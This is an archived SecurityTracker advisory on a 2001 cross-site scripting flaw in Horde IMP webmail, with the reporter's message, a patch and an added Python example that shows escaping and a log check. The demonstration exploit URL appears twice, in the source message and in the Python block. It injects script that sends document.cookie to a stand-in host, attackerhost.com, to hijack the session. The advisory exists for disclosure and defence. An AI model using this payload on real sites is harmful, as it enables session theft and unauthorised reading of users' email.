SecurityTracker.com
SecurityTracker Archives

Category:   Application (E-mail Server)  >   Horde Internet Messaging Program (IMP) Vendors:   Horde Project
Horde Internet Messaging Program (IMP) Cross-Site Scripting Flaw Lets Remote Users Steal Session Cookies and Hijack E-mail Sessions
SecurityTracker Alert ID:  1002726
SecurityTracker URL:  http://securitytracker.com/id/1002726
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Nov 9 2001
Impact:   Disclosure of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): All stable versions up through 2.2.6
Description:   A cross-site scripting vulnerability has been reported in the Horde Project Internet Messaging Program (IMP). A remote user can potentially hijack an IMP session.

It is reported that a remote user can create a malicious HTML-based e-mail message such that, when the message is viewed, arbitrary code is executed by the target user's browser. The code will appear to originate from the mail server and will be able to access the user's web mail cookies and forward those cookies to another location.

After obtaining the cookies, the remote user can then hijack the session and read the target user's email.

It is reported that the development version 2.3 and the 3.0 Release Candidate 1 are not affected by this vulnerability.

The vendor has reportedly been notified.

A demonstration exploit URL is provided in the Source Message.

Impact:   A remote user can hijack another user's email session.
Solution:   A new version is pending and will be available shortly. A patch is available. The author of the report states that you can apply the patch using:

http://cvs.horde.org/diff.php/imp/Attic/status.php3?r1=2.7.2.22&r2=2.7.2.23&ty=u

or, if your IMP installation is already heavily customized, just escape the $message variable before it is written into the page:

$message = htmlspecialchars($message);
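An added example (not code from the advisory or from the Horde project), written in Python rather than IMP's PHP, with html.escape standing in for htmlspecialchars(): it renders the status message from the demonstration URL quoted in the source message both unescaped and escaped, and runs a defender's check over constructed access-log lines for status.php3 requests whose decoded message parameter carries markup.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Demonstration URL quoted in the advisory's source message, re-joined
# across the line wraps of the archived page.
DEMO_URL = (
    "http://myimp.site.com/status.php3?message=%3Cscript%20language%3Djavascript"
    "%3E%20document.write(%27%3Cimg%20src%3Dhttp%3A%2F%2Fattackerhost.co"
    "m%2Fcookie.cgi%3Fcookie%3D%27%20%2B%20escape(document.cookie)%2B%"
    "20%27%3E%27)%3B%3C%2Fscript%3E%0A"
)

def message_param(url):
    """Decoded `message` query parameter, as status.php3 received it."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("message", [""])[0]

def render_status_vulnerable(message):
    """Pre-patch pattern: the variable is pasted straight into the HTML."""
    return '<p class="status">%s</p>' % message

def render_status_fixed(message):
    """Post-patch pattern: escape first; html.escape plays htmlspecialchars()."""
    return '<p class="status">%s</p>' % html.escape(message, quote=True)

ACTIVE_MARKUP = re.compile(r"<\s*/?\s*[a-z]", re.IGNORECASE)

def has_active_markup(fragment):
    """True if untrusted text still contains a live HTML tag after decoding."""
    return ACTIVE_MARKUP.search(fragment) is not None

REQUEST_TARGET = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_status_requests(access_log):
    """Defender's log check: request targets of status.php3 hits whose
    decoded `message` parameter carries markup (the advisory's pattern)."""
    hits = []
    for line in access_log.splitlines():
        m = REQUEST_TARGET.search(line)
        if m and urlsplit(m.group(1)).path.endswith("/status.php3"):
            if has_active_markup(message_param(m.group(1))):
                hits.append(m.group(1))
    return hits

# Constructed sample access log (not real traffic): one benign status
# message, one request built from the advisory's demonstration URL.
_demo = urlsplit(DEMO_URL)
SAMPLE_LOG = (
    '10.0.0.5 - - [09/Nov/2001:10:12:01 +0000] "GET /status.php3?message=Message+sent HTTP/1.0" 200 512\n'
    '10.0.0.9 - - [09/Nov/2001:10:13:44 +0000] "GET %s?%s HTTP/1.0" 200 700\n' % (_demo.path, _demo.query)
)
```

Running render_status_fixed() on the decoded demonstration message yields "&lt;script ..." text that the browser displays rather than executes; suspicious_status_requests(SAMPLE_LOG) flags only the second log line.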

Vendor URL:  www.horde.org/imp/
Cause:   Input validation error
Underlying OS:  Linux (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Vendor Issues Fix) Re: Horde Internet Messaging Program (IMP) Cross-Site Scripting Flaw Lets Remote Users Steal Session Cookies and Hijack E-mail Sessions
This is a follow-up message.
(Conectiva Issues Fix) Re: Horde Internet Messaging Program (IMP) Cross-Site Scripting Flaw Lets Remote Users Steal Session Cookies and Hijack E-mail Sessions
The vendor has released a fix.
(Caldera Issues Fix) Horde Internet Messaging Program (IMP) Cross-Site Scripting Flaw Lets Remote Users Steal Session Cookies and Hijack E-mail Sessions
The vendor has released a fix.



 Source Message Contents

Subject:  Imp Webmail session hijacking vulnerability


- After hijacking the cookies, the attacker can use the session and read 
- Imp webmail is part of the Horde Application Framework, at

- Imp is included in the Linux Mandrake, Conectiva Distributions. 

- It's used in several webmail sites, some of which
- All stable imp webmail versions, up to and including 2.2.6, are vulnerable; the 
devel version 2.3 and 3.0 Release Candidate 1 are not affected by this 
vulnerability.
- The horde team was warned about this and have committed a fix,
- To apply the patch use
http://cvs.horde.org/diff.php/imp/Attic/status.php3?r1=2.7.2.22&r2=2.7.2.23&ty=u
- To exploit this vulnerability using a text message, the attacker sends an
http://myimp.site.com/status.php3?message=%3Cscript%20language%3Djavascript%3E%20document.write(%27%3Cimg%20src%3Dhttp%3A%2F%2Fattackerhost.com%2Fcookie.cgi%3Fcookie%3D%27%20%2B%20escape(document.cookie)%2B%20%27%3E%27)%3B%3C%2Fscript%3E%0A
which in turn redirects the user's browser to the attacker's server, where 
he hijacks the cookies that the browser used in the context of the webmail 
site, and therefore the session.
This attack is just one more example on how trusting user input is a Bad 
Thing(tm), as well as the risks inherent to cross-site script attacks.
cookie-based session sites, after reading about the MS Wallet attack and saw 
how almost 2 years after the CERT advisory on these techniques, lots of 
applications are still vulnerable. There are probably lots of kids around 
exploiting similar vulnerabilities. So check your web applications for 
similar vulnerabilities and ask yourself how many times have you pasted
directly into the html some variable passed by the url or cookie.

- For more info on cross-site scripting, read CERT advisory and 
Imp Project homepage:
http://www.horde.org/imp/
Marc Slemko's "Microsoft Passport to Trouble":
http://alive.znep.com/~marcs/passport/
CERT advisory on cross-site scripting
http://www.cert.org/advisories/CA-2000-02.html

megas@phibernet.org
Phibernet Information Network
